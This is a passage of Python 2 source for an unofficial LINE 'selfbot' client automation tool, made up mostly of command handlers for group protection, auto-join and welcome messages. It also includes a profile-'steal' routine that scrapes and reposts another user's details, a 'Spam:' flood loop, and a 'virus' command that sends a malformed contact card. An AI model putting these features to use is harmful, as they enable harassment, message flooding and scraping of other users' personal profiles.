msg.contentMetadata["displayName"] copy = msg.contentMetadata["mid"] groups = cl.getGroup(msg.to) pending = groups.invitee targets = [] for s in groups.members: if _name in s.displayName: print "[Target] Stealed" break else: targets.append(copy) if targets == []: pass else: for target in targets: try: cl.findAndAddContactsByMid(target) contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) wait["steal"] = False break except: pass if wait["alwayRead"] == True: if msg.toType == 0: cl.sendChatChecked(msg.from_,msg.id) else: cl.sendChatChecked(msg.to,msg.id) if op.type == 25: msg = op.message if msg.contentType == 13: if wait["wblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: cl.sendText(msg.to,"In Blacklist") wait["wblack"] = False else: wait["commentBlack"][msg.contentMetadata["mid"]] = True wait["wblack"] = False cl.sendText(msg.to,"Nothing") elif wait["dblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: del wait["commentBlack"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblack"] = False else: wait["dblack"] = False cl.sendText(msg.to,"Not in Blacklist") elif wait["wblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: cl.sendText(msg.to,"In Blacklist") wait["wblacklist"] = False else: wait["blacklist"][msg.contentMetadata["mid"]] = True wait["wblacklist"] = False cl.sendText(msg.to,"Done") elif wait["dblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: del wait["blacklist"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblacklist"] = False else: wait["dblacklist"] = False cl.sendText(msg.to,"Done") elif wait["contact"] == True: msg.contentType = 0 cl.sendText(msg.to,msg.contentMetadata["mid"]) if 'displayName' in msg.contentMetadata: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) else: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) elif msg.contentType == 16: if wait["timeline"] == True: msg.contentType = 0 if wait["lang"] == "JP": msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"] else: msg.text = msg.contentMetadata["postEndUrl"] cl.sendText(msg.to,msg.text) elif msg.text is None: return elif msg.text.lower() == 'help0': if wait["lang"] == "JP": cl.sendText(msg.to,helpThx) else: cl.sendText(msg.to,helpmsg) elif msg.text.lower() == 'help': if wait["lang"] == "JP": cl.sendText(msg.to,helpmsg) else: cl.sendText(msg.to,helpmsg) elif msg.text.lower() == 'help1': if wait["lang"] == "JP": cl.sendText(msg.to,helppro) else: cl.sendText(msg.to,helppro) elif msg.text.lower() == 'help2': if wait["lang"] == "JP": cl.sendText(msg.to,helpself) else: cl.sendText(msg.to,helpself) elif msg.text.lower() == 'help3': if wait["lang"] == "JP": cl.sendText(msg.to,helpgrup) else: cl.sendText(msg.to,helpgrup) elif msg.text.lower() == 'help4': if wait["lang"] == "JP": cl.sendText(msg.to,helpset) else: cl.sendText(msg.to,helpset) elif msg.text.lower() == 'help5': if wait["lang"] == "JP": cl.sendText(msg.to,helptranslate) else: cl.sendText(msg.to,helptranslate) elif msg.text in ["Sp","Speed","speed"]: start = time.time() cl.sendText(msg.to, "「ความเร็วของเอว」") elapsed_time = time.time() - start cl.sendText(msg.to, "%s/ต่อวินาที😆😆" % (elapsed_time)) elif msg.text == "วัดรอบ": cl.sendText(msg.to,"「 วัดความเร็ว」") start = time.time() for i in range(3000): 1+1 elsp = time.time() - start cl.sendText(msg.to,"%s/ต่อวินาที" % (elsp)) elif msg.text.lower() == 'ไวรัส': msg.contentType = 13 msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"} cl.sendMessage(msg) elif msg.text.lower() == 'me': msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif ".fb" in msg.text: a = msg.text.replace(".fb","") b = urllib.quote(a) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses") cl.sendText(msg.to, "https://www.facebook.com" + b) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses") #========================== FOR COMMAND BOT STARTING =============================# elif msg.text.lower() == 'เปิดคท': if wait["contact"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: wait["contact"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") elif msg.text.lower() == 'ปิดคท': if wait["contact"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") else: wait["contact"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") elif msg.text.lower() == 'เปิดกัน': if wait["protect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") elif msg.text.lower() == 'กันลิ้ง': if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") elif msg.text.lower() == 'กันเชิญ': if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already On") else: cl.sendText(msg.to,"Protection Invite already On") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи") else: cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи") elif msg.text.lower() == 'กันยก': if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") elif msg.text.lower() == 'เปิดเข้า': if wait["autoJoin"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") else: wait["autoJoin"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") elif msg.text.lower() == 'ปิดเข้า': if wait["autoJoin"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") else: wait["autoJoin"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") elif msg.text.lower() == 'ปิดกัน': if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection already Off") else: cl.sendText(msg.to,"Protection already Off") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff") else: cl.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff") elif msg.text.lower() == 'ปิดกันลิ้ง': if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already off") else: cl.sendText(msg.to,"Protection Qr already off") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already Off") else: cl.sendText(msg.to,"Protection Qr already Off") elif msg.text.lower() == 'ปิดกันเชิญ': if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") else: wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") elif msg.text.lower() == 'ปิดกันยก': if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: cl.sendText(msg.to,"Protection Cancel already Off") else: wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: cl.sendText(msg.to,"Protection Cancel already Off") elif "ออก:" in msg.text: try: strnum = msg.text.replace("ออก:","") if strnum == "off": wait["autoCancel"]["on"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ปิดใช้งานการปฏิเสธการเข้าร่วมกลุ่ม") else: cl.sendText(msg.to,"ปิดคำเชิญถูกปฏิเสธ โปรดระบุจำนวนที่ใช้ในการเปิดเมื่อคุณต้องการส่ง") else: num = int(strnum) wait["autoCancel"]["on"] = True if wait["lang"] == "JP": cl.sendText(msg.to,strnum + "กลุ่มต่อไปที่ได้รับเชิญจะถูกปฏิเสธโดยอัตโนมัติ") else: cl.sendText(msg.to,strnum + "ปฏิเสธการสร้างคำเชิญโดยอัตโนมัติ") except: if wait["lang"] == "JP": cl.sendText(msg.to,"Nilai tidak benar") else: cl.sendText(msg.to,"Weird value") elif msg.text.lower() == 'เปิดออก': if wait["leaveRoom"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"เปิดระบบออกแชทโดยอัตโนมัติ") else: cl.sendText(msg.to,"เปิดระบบออกแชทไว้อยู่แล้ว") else: wait["leaveRoom"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to on") else: cl.sendText(msg.to,"Auto Leave room already on") elif msg.text.lower() == 'ปิดออก': if wait["leaveRoom"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ปิดระบบออกแชทโดยอัตโนมัติ") else: cl.sendText(msg.to,"ปิดระบบออกแชทโดยอัตโนมัติไว้อยู่แล้ว") else: wait["leaveRoom"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to off") else: cl.sendText(msg.to,"Auto Leave room already off") elif msg.text.lower() == 'เปิดแชร์': if wait["timeline"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") else: wait["timeline"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") elif msg.text.lower() == 'ปิดแชร์': if wait["timeline"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") else: wait["timeline"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") #======================================================# elif msg.text in ["Thx1","thx1"]: cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"])) elif msg.text in ["Thx2","thx2"]: cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"])) elif msg.text in ["Thx3","thx3"]: cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"])) #======================================================# elif "Thx1:" in msg.text: c = msg.text.replace("Thx1:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!") else: wait["acomment"] = c cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c) elif "Thx2:" in msg.text: c = msg.text.replace("Thx2:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!") else: wait["bcomment"] = c cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c) elif "Thx3:" in msg.text: c = msg.text.replace("Thx3:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!") else: wait["ccomment"] = c cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c) #======================================================# elif msg.text in ["Thx1 on"]: if wait["acommentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already on") else: wait["acommentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Thx1 off"]: if wait["acommentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already off") else: wait["acommentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already off") #======================================================# elif msg.text in ["Thx2 on"]: if wait["bcommentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already on") else: wait["bcommentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Thx2 off"]: if wait["bcommentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already off") else: wait["bcommentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already off") #======================================================# elif msg.text in ["Thx3 on"]: if wait["ccommentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already on") else: wait["ccommentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Thx3 off"]: if wait["ccommentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already off") else: wait["ccommentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already off") #======================================================# elif msg.text in ["Red on","red on"]: cl.sendText(msg.to,"一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一") cl.sendText(msg.to,"Please wait......") cl.sendText(msg.to,"Turn on all protection") cl.sendText(msg.to,"Qr on") cl.sendText(msg.to,"Backup:on") cl.sendText(msg.to,"Read:on") cl.sendText(msg.to,"Respon:on") cl.sendText(msg.to,"Responkick:on") cl.sendText(msg.to,"Protect on") cl.sendText(msg.to,"Namelock:on") cl.sendText(msg.to,"Blockinvite:on") #======================================================# elif msg.text in ["Red off","red off"]: cl.sendText(msg.to,"一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一") cl.sendText(msg.to,"Please wait......") cl.sendText(msg.to,"Turn off all protection") cl.sendText(msg.to,"Qr:off") cl.sendText(msg.to,"Backup:off") cl.sendText(msg.to,"Read:off") cl.sendText(msg.to,"Respon:off") cl.sendText(msg.to,"Responkick:off") cl.sendText(msg.to,"Protect:off") cl.sendText(msg.to,"Namelock:off") cl.sendText(msg.to,"Blockinvite:off") cl.sendText(msg.to,"Link off") #======================================================# elif msg.text in ["Set1","เช็ค1"]: md = "一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一\n" if wait["contact"] == True: md+="􀜁􀇔􏿿 Contact:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="􀜁􀇔􏿿 Auto Join:on 􀜁􀄯􏿿\n" else: md +="􀜁􀇔􏿿 Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="􀜁􀇔􏿿 Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+= "􀜁􀇔􏿿 Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="􀜁􀇔􏿿 Auto leave:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Auto leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="􀜁􀇔􏿿 Share:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="􀜁􀇔􏿿 Auto add:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto add:off 􀜁��􏿿\n" if wait["commentOn"] == True: md+="􀜁􀇔􏿿 Auto komentar:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto komentar:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="􀜁􀇔􏿿 Protect:on 🔓\n" else:md+="􀜁􀇔􏿿 Protect:off 🔒\n" if wait["linkprotect"] == True: md+="􀜁􀇔􏿿Link Protect:on 🔓\n" else:md+="􀜁􀇔􏿿 Link Protect:off🔒\n" if wait["inviteprotect"] == True: md+="􀜁􀇔􏿿Invitation Protect:on🔓\n" else:md+="􀜁􀇔􏿿 Invitation Protect:off🔒\n" if wait["cancelprotect"] == True: md+"􀜁􀇔􏿿 CancelProtect:on 🔓\n" else:md+="􀜁􀇔􏿿 Cancel Protect:off 🔒\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': admin} cl.sendMessage(msg) #======================================================# elif msg.text in ["Set2","เช็ค2"]: print "Setting pick up..." md = "一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一\n" if wait["likeOn"] == True: md+="􀬁􀆐􏿿 Auto like : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Auto like : off 􀜁􀄰􏿿\n" if wait["alwayRead"] == True: md+="􀬁􀆐􏿿 Read : on 􀜁􀄯􏿿\n" else:md+="􀬁��􏿿 Read : off 􀜁􀄰􏿿\n" if wait["detectMention"] == True: md+="􀬁􀆐􏿿 Autorespon : on 􀜁􀄯􏿿\n" else:md+="􀬁??􏿿 Autorespon : off 􀜁􀄰􏿿\n" if wait["kickMention"] == True: md+="􀬁􀆐􏿿 Autokick: on 􀜁����􏿿\n" else:md+="􀬁􀆐􏿿 Autokick : off 􀜁􀄰􏿿\n" if wait["Notifed"] == True: md+="􀬁􀆐􏿿 Notifed : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Notifed : off 􀜁􀄰􏿿\n" if wait["Notifedbot"] == True: md+="􀬁􀆐􏿿 Notifedbot : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Notifedbot : off 􀜁􀄰􏿿\n" if wait["acommentOn"] == True: md+="􀬁􀆐􏿿 Hhx1 : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Thx1 : off 􀜁􀄰􏿿\n" if wait["bcommentOn"] == True: md+="􀬁􀆐􏿿 Hhx2 : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Thx2 : off 􀜁􀄰􏿿\n" if wait["ccommentOn"] == True: md+="􀬁􀆐􏿿 Hhx3 : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Thx3 : off 􀜁􀄰􏿿\n" if wait["Protectcancl"] == True: md+="􀬁􀆐􏿿 Cancel : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Cancel : off 􀜁􀄰􏿿\n" if wait["winvite"] == True: md+="􀬁􀆐􏿿 Invite : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Invite : off 􀜁􀄰􏿿\n" if wait["pname"] == True: md+="􀬁􀆐􏿿 Namelock : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Namelock : off 􀜁􀄰􏿿\n" if wait["contact"] == True: md+="􀬁􀆐􏿿 Contact : on 􀜁􀄯􏿿\n" else: md+="􀬁􀆐􏿿 Contact : off 􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="􀬁􀆐􏿿 Auto join : on 􀜁􀄯􏿿\n" else: md +="􀬁􀆐􏿿 Auto join : off 􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="􀬁􀆐􏿿 Group cancel :" + str(wait["autoCancel"]["members"]) + " 􀜁􀄯􏿿\n" else: md+= "􀬁􀆐􏿿 Group cancel : off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="􀬁􀆐􏿿 Auto leave : on 􀜁􀄯􏿿\n" else: md+="􀬁􀆐􏿿 Auto leave : off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="􀬁􀆐􏿿 Share : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Share : off 􀜁􀄰􏿿\n" if wait["clock"] == True: md+="􀬁􀆐􏿿 Clock Name : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Clock Name : off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="􀬁􀆐􏿿 Auto add : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Auto add : off 􀜁􀄰􏿿\n" if wait["commentOn"] == True: md+="􀬁􀆐􏿿 Comment : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Comment : off 􀜁􀄰􏿿\n" if wait["Backup"] == True: md+="􀬁􀆐􏿿 Backup : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Backup : off 􀜁􀄰􏿿\n" if wait["qr"] == True: md+="􀬁􀆐􏿿 Protect QR : on 􀜁􀄯􏿿\n" else:md+="􀬁􀆐􏿿 Protect QR : off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': admin} cl.sendMessage(msg) #======================================================# elif msg.text.lower() == 'เช็ค': md = "" if wait["contact"] == True: md+="Contact:on 􀜁􀄯􏿿\n" else: md+="Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="Auto Join:on 􀜁􀄯􏿿\n" else: md +="Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+= "Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="Auto leave:on 􀜁􀄯􏿿\n" else: md+="Auto leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="Share:on 􀜁􀄯􏿿\n" else:md+="Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="Auto add:on 􀜁􀄯􏿿\n" else:md+="Auto add:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="Protect:on 􀜁􀄯􏿿\n" else:md+="Protect:off 􀜁􀄰􏿿\n" if wait["linkprotect"] == True: md+="Link Protect:on 􀜁􀄯􏿿\n" else:md+="Link Protect:off 􀜁􀄰􏿿\n" if wait["inviteprotect"] == True: md+="Invitation Protect:on 􀜁􀄯􏿿\n" else:md+="Invitation Protect:off 􀜁􀄰􏿿\n" if wait["cancelprotect"] == True: md+="Cancel Protect:on 􀜁􀄯􏿿\n" else:md+="Cancel Protect:off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif cms(msg.text,["ผส","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "ub5abe828cd964292195c3c59d6322033"} cl.sendMessage(msg) kk.sendMessage(msg) elif msg.text.lower() == 'เปิดแอด': if wait["autoAdd"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") else: wait["autoAdd"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to on") else: cl.sendText(msg.to,"Auto add already on") elif msg.text.lower() == 'ปิดแอด': if wait["autoAdd"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") else: wait["autoAdd"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto add set to off") else: cl.sendText(msg.to,"Auto add already off") elif "Pesan set:" in msg.text: wait["message"] = msg.text.replace("Pesan set:","") cl.sendText(msg.to,"We changed the message") elif msg.text.lower() == 'pesan cek': if wait["lang"] == "JP": cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) else: cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"]) elif "Come Set:" in msg.text: c = msg.text.replace("Come Set:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah") else: wait["comment"] = c cl.sendText(msg.to,"Ini telah diubah\n\n" + c) elif msg.text in ["Com on","เปิดเม้น","Comment on"]: if wait["commentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Aku berada di") else: cl.sendText(msg.to,"To open") else: wait["commentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Comment Actived") else: cl.sendText(msg.to,"Comment Has Been Active") elif msg.text in ["Come off","ปิดเม้น"]: if wait["commentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Hal ini sudah off") else: cl.sendText(msg.to,"It is already turned off") else: wait["commentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Off") else: cl.sendText(msg.to,"To turn off") elif msg.text in ["Com","Comment"]: cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:??\n\n" + str(wait["comment"])) elif msg.text in ["Com Bl"]: wait["wblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist") elif msg.text in ["Com hapus Bl"]: wait["dblack"] = True cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist") elif msg.text in ["Com Bl cek"]: if wait["commentBlack"] == {}: cl.sendText(msg.to,"Nothing in the blacklist") else: cl.sendText(msg.to,"The following is a blacklist") mc = "" for mi_d in wait["commentBlack"]: mc += "・" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text.lower() == 'jam on': if wait["clock"] == True: cl.sendText(msg.to,"Jam already on") else: wait["clock"] = True now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Jam set on") elif msg.text.lower() == 'jam off': if wait["clock"] == False: cl.sendText(msg.to,"Jam already off") else: wait["clock"] = False cl.sendText(msg.to,"Jam set off") elif "Jam say:" in msg.text: n = msg.text.replace("Jam say:","") if len(n.decode("utf-8")) > 30: cl.sendText(msg.to,"terlalu lama") else: wait["cName"] = n cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n) elif msg.text.lower() == 'update': if wait["clock"] == True: now2 = datetime.now() nowT = datetime.strftime(now2,"?%H:%M?") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Diperbarui") else: cl.sendText(msg.to,"Silahkan Aktifkan Jam") elif "รูป " in msg.text: search = msg.text.replace("รูป ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass #========================== FOR COMMAND BOT FINISHED =============================# elif "Spam change:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam change:","") cl.sendText(msg.to,"spam changed") elif "Spam add:" in msg.text: if msg.toType == 2: wait["spam"] = msg.text.replace("Spam add:","") if wait["lang"] == "JP": cl.sendText(msg.to,"spam changed") else: cl.sendText(msg.to,"Done") elif "Spam:" in msg.text: if msg.toType == 2: strnum = msg.text.replace("Spam:","") num = int(strnum) for var in range(0,num): cl.sendText(msg.to, wait["spam"]) #===================================== elif "พูด " in msg.text: if 